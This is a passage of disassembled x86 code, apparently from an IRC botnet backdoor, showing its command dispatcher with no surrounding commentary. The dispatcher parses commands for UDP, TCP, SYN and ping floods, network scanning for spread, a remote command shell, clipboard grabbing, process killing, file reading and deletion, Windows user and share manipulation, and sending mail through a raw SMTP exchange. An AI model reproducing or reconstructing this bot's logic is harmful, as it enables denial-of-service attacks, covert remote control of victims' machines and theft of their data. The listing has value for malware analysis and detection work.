xor edx, edx
repe cmpsb
jz loc_40C16A
push 3
mov edi, eax
mov esi, offset aS4 ; "s4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C16A
push 0Bh
mov edi, eax
mov esi, offset aSocks4stop ; "socks4stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408753
push [ebp+ebx+var_A0]
push 12h
push offset aServer_0 ; "Server"
push offset aSocks4_0 ; "[SOCKS4]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408753: ; CODE XREF: sub_4078FA+E3F�j
push 0Bh
mov edi, eax
mov esi, offset aRloginstop ; "rloginstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40877B
push [ebp+ebx+var_A0]
push 7
push offset aServer_0 ; "Server"
push offset aRlogind ; "[RLOGIND]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40877B: ; CODE XREF: sub_4078FA+E67�j
push 9
mov edi, eax
mov esi, offset aHttpstop ; "httpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4087A3
push [ebp+ebx+var_A0]
push 4
push offset aServer_0 ; "Server"
push offset aHttpd ; "[HTTPD]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4087A3: ; CODE XREF: sub_4078FA+E8F�j
push 8
mov edi, eax
mov esi, offset aLogstop ; "logstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4087CB
push [ebp+ebx+var_A0]
push 1Dh
push offset aLogList ; "Log list"
push offset aLog ; "[LOG]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4087CB: ; CODE XREF: sub_4078FA+EB7�j
push 0Dh
mov edi, eax
mov esi, offset aRedirectstop ; "redirectstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4087F3
push [ebp+ebx+var_A0]
push 11h
push offset aTcpRedirect ; "TCP redirect"
push offset aRedirect_0 ; "[REDIRECT]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4087F3: ; CODE XREF: sub_4078FA+EDF�j
push 0Ah
mov edi, eax
mov esi, offset aDdos_stop ; "ddos.stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40881B
push [ebp+ebx+var_A0]
push 0Bh
push offset aDdosFlood ; "DDoS flood"
push offset aDdos ; "[DDoS]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40881B: ; CODE XREF: sub_4078FA+F07�j
push 8
mov edi, eax
mov esi, offset aSynstop ; "synstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408843
push [ebp+ebx+var_A0]
push 0Ch
push offset aSynFlood ; "Syn flood"
push offset aSyn ; "[SYN]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408843: ; CODE XREF: sub_4078FA+F2F�j
push 8
mov edi, eax
mov esi, offset aUdpstop ; "udpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40886B
push [ebp+ebx+var_A0]
push 10h
push offset aUdpFlood ; "UDP flood"
push offset aUpd ; "[UPD]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40886B: ; CODE XREF: sub_4078FA+F57�j
push 9
mov edi, eax
mov esi, offset aPingstop ; "pingstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408893
push [ebp+ebx+var_A0]
push 0Fh
push offset aPingFlood ; "Ping flood"
push offset aPing_1 ; "[PING]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408893: ; CODE XREF: sub_4078FA+F7F�j
push 9
mov edi, eax
mov esi, offset aIcmpstop ; "icmpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4088BB
push [ebp+ebx+var_A0]
push 0Eh
push offset aIcmpFlood ; "ICMP flood"
loc_4088B1: ; CODE XREF: sub_4078FA+FDF�j
push offset aIcmp_0 ; "[ICMP]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4088BB: ; CODE XREF: sub_4078FA+FA7�j
push 8
mov edi, eax
mov esi, offset aTcpstop ; "tcpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4088DB
push [ebp+ebx+var_A0]
push 0Dh
push offset aTcpFlood ; "TCP flood"
jmp short loc_4088B1
; ---------------------------------------------------------------------------
loc_4088DB: ; CODE XREF: sub_4078FA+FCF�j
push 9
mov edi, eax
mov esi, offset aTftpstop ; "tftpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408903
push [ebp+ebx+var_A0]
push 5
push offset aServer_0 ; "Server"
push offset aTftp_0 ; "[TFTP]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408903: ; CODE XREF: sub_4078FA+FEF�j
push 0Ah
mov edi, eax
mov esi, offset aProcsstop ; "procsstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C13B
push 7
mov edi, eax
mov esi, offset aPsstop ; "psstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C13B
push 0Ah
mov edi, eax
mov esi, offset aClonestop ; "clonestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408953
push [ebp+ebx+var_A0]
push 18h
push offset aClone ; "Clone"
push offset aClones ; "[CLONES]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408953: ; CODE XREF: sub_4078FA+103F�j
push 0Bh
mov edi, eax
mov esi, offset aSecurestop ; "securestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40897B
push [ebp+ebx+var_A0]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset aSecure_1 ; "[SECURE]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40897B: ; CODE XREF: sub_4078FA+1067�j
push 9
mov edi, eax
mov esi, offset aScanstop ; "scanstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4089A3
push [ebp+ebx+var_A0]
push 9
push offset aScan_1 ; "Scan"
push offset aScan_0 ; "[SCAN]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4089A3: ; CODE XREF: sub_4078FA+108F�j
push 0Ah
mov edi, eax
mov esi, offset aScanstats ; "scanstats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C122
push 6
mov edi, eax
mov esi, offset aStats ; "stats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C122
push 0Ah
mov edi, eax
mov esi, offset aReconnect ; "reconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C101
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C101
push 0Bh
mov edi, eax
mov esi, offset aDisconnect ; "disconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0DF
push 3
mov edi, eax
mov esi, offset aDc ; "dc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0DF
push 5
mov edi, eax
mov esi, offset aQuit_0 ; "quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C095
push 2
mov edi, eax
mov esi, offset aQ ; "q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C095
push 7
mov edi, eax
mov esi, offset aStatus ; "status"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C056
push 2
mov edi, eax
mov esi, offset aS_3 ; "s"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C056
push 3
mov edi, eax
mov esi, offset aId ; "id"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C01E
push 2
mov edi, eax
mov esi, offset aI_0 ; "i"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C01E
push 7
mov edi, eax
mov esi, offset aReboot ; "reboot"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408AE5
call sub_4058F3
test eax, eax
mov eax, offset aMainRebootingS ; "[MAIN]: Rebooting system."
jnz short loc_408AB6
mov eax, offset aMainFailedToRe ; "[MAIN]: Failed to reboot system."
loc_408AB6: ; CODE XREF: sub_4078FA+11B5�j
push eax
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 1Ch
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_408AE5: ; CODE XREF: sub_4078FA+11A7�j
push 8
mov edi, eax
mov esi, offset aThreads ; "threads"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF2F
push 2
mov edi, eax
mov esi, offset aT ; "t"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF2F
push 8
mov edi, eax
mov esi, offset aAliases ; "aliases"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF0C
push 3
mov edi, eax
mov esi, offset aAl ; "al"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF0C
push 4
mov edi, eax
mov esi, offset aLog_0 ; "log"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE19
push 3
mov edi, eax
mov esi, offset aLg ; "lg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE19
push 9
mov edi, eax
mov esi, offset aClearlog ; "clearlog"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDFD
push 4
mov edi, eax
mov esi, offset aClg ; "clg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDFD
push 8
mov edi, eax
mov esi, offset aNetinfo ; "netinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDC2
push 3
mov edi, eax
mov esi, offset aNi ; "ni"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDC2
push 8
mov edi, eax
mov esi, offset aSysinfo ; "sysinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD96
push 3
mov edi, eax
mov esi, offset aSi ; "si"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD96
push 8
mov edi, eax
mov esi, offset aDestroy ; "destroy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD19
push 0Bh
mov edi, eax
mov esi, offset aErradicate ; "erradicate"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD19
push 6
mov edi, eax
mov esi, offset aProcs ; "procs"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BBF3
push 3
mov edi, eax
mov esi, offset aPs ; "ps"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BBF3
push 7
mov edi, eax
mov esi, offset aUptime ; "uptime"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB6C
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB6C
push 0Ah
mov edi, eax
mov esi, offset aDriveinfo ; "driveinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB4F
push 4
mov edi, eax
mov esi, offset aDrv ; "drv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB4F
push 9
mov edi, eax
mov esi, offset aTestdlls ; "testdlls"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB36
push 4
mov edi, eax
mov esi, offset aDll ; "dll"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB36
push 8
mov edi, eax
mov esi, offset aOpencmd ; "opencmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAF7
push 5
mov edi, eax
mov esi, offset aOcmd ; "ocmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAF7
push 8
mov edi, eax
mov esi, offset aCmdstop ; "cmdstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408CED
push [ebp+ebx+var_A0]
push 8
push offset aRemoteShell ; "Remote shell"
push offset aCmd_0 ; "[CMD]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408CED: ; CODE XREF: sub_4078FA+13D9�j
push 4
mov edi, eax
mov esi, offset aWho ; "who"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40902C
cmp [ebp+var_C], edx
jnz short loc_408D20
push edx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_408D20: ; CODE XREF: sub_4078FA+140A�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_408D25: ; CODE XREF: sub_4078FA+1472�j
cmp byte ptr [edi], 0
lea eax, [edi+1]
jnz short loc_408D32
mov eax, offset aEmpty ; "<Empty>"
loc_408D32: ; CODE XREF: sub_4078FA+1431�j
push eax
push esi
lea eax, [ebp+var_2E0]
push offset aD_S ; "%d. %s"
push eax
call sub_412BB5
push 1
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_408D25
push offset aMainLoginListC ; "[MAIN]: Login list complete."
call sub_401C33
mov eax, [ebp+var_20]
pop ecx
loc_408D7C: ; CODE XREF: sub_4078FA+22DD�j
; sub_4078FA+4BC1�j
mov ecx, [ebp+ebx+var_94]
test ecx, ecx
mov [ebp+var_14], ecx
jz loc_407B7B
push 8
mov edi, eax
mov esi, offset aAdvscan ; "advscan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB69
push 4
mov edi, eax
mov esi, offset aAsc ; "asc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB69
push 9
mov edi, eax
mov esi, offset aUdpflood ; "udpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA12
push 4
mov edi, eax
mov esi, offset aUdp ; "udp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA12
push 2
mov edi, eax
mov esi, offset aU ; "u"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA12
push 0Ah
mov edi, eax
mov esi, offset aPingflood ; "pingflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8CF
push 5
mov edi, eax
mov esi, offset aPing_0 ; "ping"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8CF
push 2
mov edi, eax
mov esi, offset aP ; "p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8CF
push 9
mov edi, eax
mov esi, offset aTcpflood ; "tcpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6C4
push 4
mov edi, eax
mov esi, offset aTcp ; "tcp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6C4
push 6
mov edi, eax
mov esi, offset aEmail ; "email"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40C4CE
mov eax, [ebp+ebx+var_A0]
lea edx, [ebp+var_B70]
sub edx, eax
loc_408E79: ; CODE XREF: sub_4078FA+1587�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408E79
push [ebp+ebx+var_9C]
call sub_412F42
mov esi, eax
mov eax, [ebp+ebx+var_98]
lea edx, [ebp+var_18E8]
pop ecx
sub edx, eax
loc_408EA1: ; CODE XREF: sub_4078FA+15AF�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408EA1
mov eax, [ebp+var_14]
lea edx, [ebp+var_1340]
sub edx, eax
loc_408EB6: ; CODE XREF: sub_4078FA+15C4�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408EB6
push offset asc_41FA74 ; " "
push offset a_ ; "_"
push [ebp+ebx+var_90]
call sub_40556E
add esp, 0Ch
lea edx, [ebp+var_19E8]
loc_408EDF: ; CODE XREF: sub_4078FA+15ED�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_408EDF
lea eax, [ebp+var_1D78]
push eax
push 101h
call dword_4334B0
lea eax, [ebp+var_B70]
push eax
call dword_433500
push 6
push 1
push 2
mov ebx, eax
call dword_4334A0
mov edi, eax
mov [ebp+var_C8], 2
mov eax, [ebx+0Ch]
mov eax, [eax]
mov eax, [eax]
push esi
mov [ebp+var_C4], eax
call dword_4335EC
mov [ebp+var_C6], ax
lea eax, [ebp+var_19E8]
push eax
lea eax, [ebp+var_18E8]
push eax
lea eax, [ebp+var_19E8]
push eax
lea eax, [ebp+var_1340]
push eax
lea eax, [ebp+var_18E8]
push eax
lea eax, [ebp+var_2178]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_412BB5
add esp, 1Ch
push 10h
lea eax, [ebp+var_C8]
push eax
push edi
call dword_433458
xor ebx, ebx
push ebx
mov esi, 100h
push esi
lea eax, [ebp+var_15E4]
push eax
push edi
call dword_433414
lea eax, [ebp+var_15E4]
lea ecx, [eax+1]
loc_408FA3: ; CODE XREF: sub_4078FA+16AE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_408FA3
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_2178]
push eax
push edi
call dword_433534
push ebx
push esi
lea eax, [ebp+var_15E4]
push eax
push edi
call dword_433414
push edi
call dword_4335AC
call dword_4335B8
lea eax, [ebp+var_1340]
push eax
lea eax, [ebp+var_2E0]
push offset aEmailMessageSe ; "[EMAIL]: Message sent to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], ebx
jnz short loc_409015
push ebx
loc_408FFA: ; CODE XREF: sub_4078FA+35BC�j
; sub_4078FA+3665�j
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40900D: ; CODE XREF: sub_4078FA+2DA6�j
call sub_4045DD
add esp, 14h
loc_409015: ; CODE XREF: sub_4078FA+16FD�j
; sub_4078FA+2D8E�j ...
mov esi, [ebp+arg_24]
loc_409018: ; CODE XREF: sub_4078FA+35FA�j
; sub_4078FA+361D�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
mov eax, esi
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40902C: ; CODE XREF: sub_4078FA+1401�j
push 8
mov edi, eax
mov esi, offset aGetclip ; "getclip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAB3
push 3
mov edi, eax
mov esi, offset aGc ; "gc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAB3
push 9
mov edi, eax
mov esi, offset aFlusharp ; "flusharp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA88
push 5
mov edi, eax
mov esi, offset aFarp ; "farp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA88
push 9
mov edi, eax
mov esi, offset aFlushdns ; "flushdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA58
push 5
mov edi, eax
mov esi, offset aFdns ; "fdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA58
push 0Ah
mov edi, eax
mov esi, offset aCurrentip ; "currentip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA1E
push 4
mov edi, eax
mov esi, offset aCip ; "cip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA1E
push 0Dh
mov edi, eax
mov esi, offset aRloginserver ; "rloginserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B8E5
push 7
mov edi, eax
mov esi, offset aRlogin ; "rlogin"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B8E5
push 0Bh
mov edi, eax
mov esi, offset aHttpserver ; "httpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B764
push 5
mov edi, eax
mov esi, offset aHttp ; "http"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B764
push 0Bh
mov edi, eax
mov esi, offset aTftpserver ; "tftpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B60D
push 5
mov edi, eax
mov esi, offset aTftp ; "tftp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B60D
push 8
mov edi, eax
mov esi, offset aScanall ; "scanall"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2D2
push 3
mov edi, eax
mov esi, offset aSa ; "sa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2D2
mov ecx, [ebp+ebx+var_A0]
test ecx, ecx
mov [ebp+var_8], ecx
jz loc_407B7B
push 5
mov edi, eax
mov esi, offset aNick_0 ; "nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2AD
push 2
mov edi, eax
mov esi, offset aN ; "n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2AD
push 5
mov edi, eax
mov esi, offset aJoin ; "join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B289
push 2
mov edi, eax
mov esi, offset aJ ; "j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B289
push 5
mov edi, eax
mov esi, offset aPart_0 ; "part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B26F
push 3
mov edi, eax
mov esi, offset aPt ; "pt"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B26F
push 4
mov edi, eax
mov esi, offset aRaw ; "raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B238
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B238
push 0Bh
mov edi, eax
mov esi, offset aKillthread ; "killthread"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B17E
push 2
mov edi, eax
mov esi, offset aK ; "k"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B17E
push 7
mov edi, eax
mov esi, offset aC_quit ; "c_quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B0D0
push 4
mov edi, eax
mov esi, offset aC_q ; "c_q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B0D0
push 0Ah
mov edi, eax
mov esi, offset aC_rndnick ; "c_rndnick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B07F
push 5
mov edi, eax
mov esi, offset aC_rn ; "c_rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B07F
push 7
mov edi, eax
mov esi, offset aPrefix ; "prefix"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B066
push 3
mov edi, eax
mov esi, offset aPr ; "pr"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B066
push 5
mov edi, eax
mov esi, offset aOpen ; "open"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B030
push 2
mov edi, eax
mov esi, offset aO ; "o"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B030
push 7
mov edi, eax
mov esi, offset aServer ; "server"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B007
push 3
mov edi, eax
mov esi, offset aSe ; "se"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B007
push 4
mov edi, eax
mov esi, offset aDns ; "dns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF97
push 3
mov edi, eax
mov esi, offset aDn ; "dn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF97
push 9
mov edi, eax
mov esi, offset aKillproc ; "killproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF64
push 3
mov edi, eax
mov esi, offset aKp ; "kp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF64
push 0Ch
mov edi, eax
mov esi, offset aKilldelproc ; "killdelproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF1C
push 4
mov edi, eax
mov esi, offset aKdp ; "kdp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF1C
push 5
mov edi, eax
mov esi, offset aKill ; "kill"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AEBB
push 3
mov edi, eax
mov esi, offset aKi ; "ki"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AEBB
push 7
mov edi, eax
mov esi, offset aDelete ; "delete"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE69
push 4
mov edi, eax
mov esi, offset aDel ; "del"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE69
push 5
mov edi, eax
mov esi, offset aList_0 ; "list"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE49
push 3
mov edi, eax
mov esi, offset aLi ; "li"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE49
push 8
mov edi, eax
mov esi, offset aMirccmd ; "mirccmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ADD0
push 5
mov edi, eax
mov esi, offset aMirc ; "mirc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ADD0
push 4
mov edi, eax
mov esi, offset aCmd ; "cmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AD74
push 3
mov edi, eax
mov esi, offset aCm ; "cm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AD74
push 9
mov edi, eax
mov esi, offset aReadfile ; "readfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ACE0
push 3
mov edi, eax
mov esi, offset aRf ; "rf"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ACE0
push 4
mov edi, eax
mov esi, offset aNet ; "net"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40971F
xor eax, eax
cmp dword_433600, eax
jz short loc_4094A6
cmp dword_433628, eax
jz short loc_4094A6
push offset aNetFailedToLoa ; "[NET]: Failed to load advapi32.dll or n"...
jmp loc_409714
; ---------------------------------------------------------------------------
loc_4094A6: ; CODE XREF: sub_4078FA+1B98�j
; sub_4078FA+1BA0�j
cmp [ebp+var_14], eax
jz loc_40AE14
mov eax, [ebp+ebx+var_9C]
and [ebp+arg_0], 0
test eax, eax
mov [ebp+var_10], eax
jz short loc_4094CF
push eax
push [ebp+var_14]
call sub_413920
pop ecx
pop ecx
mov [ebp+arg_0], eax
loc_4094CF: ; CODE XREF: sub_4078FA+1BC5�j
mov edx, [ebp+var_8]
push 6
mov edi, edx
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40953D
cmp [ebp+var_10], eax
jz short loc_40950B
push [ebp+arg_0]
push 3
loc_4094EC: ; CODE XREF: sub_4078FA+1C58�j
; sub_4078FA+1C6F�j ...
call sub_40668A
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 14h
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_40950B: ; CODE XREF: sub_4078FA+1BEB�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405DC5
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_409533
push offset aNetServiceList ; "[NET]: Service list completed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_409533: ; CODE XREF: sub_4078FA+1C2D�j
push offset aNetServiceLi_0 ; "[NET]: Service list failed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_40953D: ; CODE XREF: sub_4078FA+1BE6�j
push 5
mov edi, edx
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409554
push [ebp+arg_0]
push 4
jmp short loc_4094EC
; ---------------------------------------------------------------------------
loc_409554: ; CODE XREF: sub_4078FA+1C51�j
push 6
mov edi, edx
mov esi, offset aPause ; "pause"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40956B
push [ebp+arg_0]
push 5
jmp short loc_4094EC
; ---------------------------------------------------------------------------
loc_40956B: ; CODE XREF: sub_4078FA+1C68�j
push 9
mov edi, edx
mov esi, offset aContinue ; "continue"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409585
push [ebp+arg_0]
push 6
jmp loc_4094EC
; ---------------------------------------------------------------------------
loc_409585: ; CODE XREF: sub_4078FA+1C7F�j
push 7
mov edi, edx
mov esi, offset aDelete ; "delete"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40959F
push [ebp+arg_0]
push 1
jmp loc_4094EC
; ---------------------------------------------------------------------------
loc_40959F: ; CODE XREF: sub_4078FA+1C99�j
push 6
mov edi, edx
mov esi, offset aShare ; "share"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409623
cmp [ebp+var_10], eax
jz short loc_4095EF
cmp [ebp+var_448], al
jz short loc_4095C4
push eax
push [ebp+var_10]
push 1
jmp short loc_4095D0
; ---------------------------------------------------------------------------
loc_4095C4: ; CODE XREF: sub_4078FA+1CC0�j
push [ebp+ebx+var_98]
push [ebp+var_10]
push 0
loc_4095D0: ; CODE XREF: sub_4078FA+1CC8�j
call sub_406702
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 18h
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_4095EF: ; CODE XREF: sub_4078FA+1CB8�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4067C0
add esp, 10h
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_409619
push offset aNetShareListCo ; "[NET]: Share list completed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_409619: ; CODE XREF: sub_4078FA+1D13�j
push offset aNetShareListFa ; "[NET]: Share list failed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_409623: ; CODE XREF: sub_4078FA+1CB3�j
push 5
mov edi, edx
mov esi, offset aUser ; "user"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_4096C5
cmp [ebp+var_10], eax
jz short loc_409691
cmp [ebp+var_448], al
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
jz short loc_409658
push eax
push [ebp+var_10]
push 1
jmp short loc_409672
; ---------------------------------------------------------------------------
loc_409658: ; CODE XREF: sub_4078FA+1D54�j
mov ebx, [ebp+ebx+var_98]
test ebx, ebx
jz short loc_40966B
push ebx
push [ebp+var_10]
push 0
jmp short loc_409672
; ---------------------------------------------------------------------------
loc_40966B: ; CODE XREF: sub_4078FA+1D67�j
push 0
push [ebp+var_10]
push 2
loc_409672: ; CODE XREF: sub_4078FA+1D5C�j
; sub_4078FA+1D6F�j
call sub_4068DF
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 24h
jmp loc_40AE14
; ---------------------------------------------------------------------------
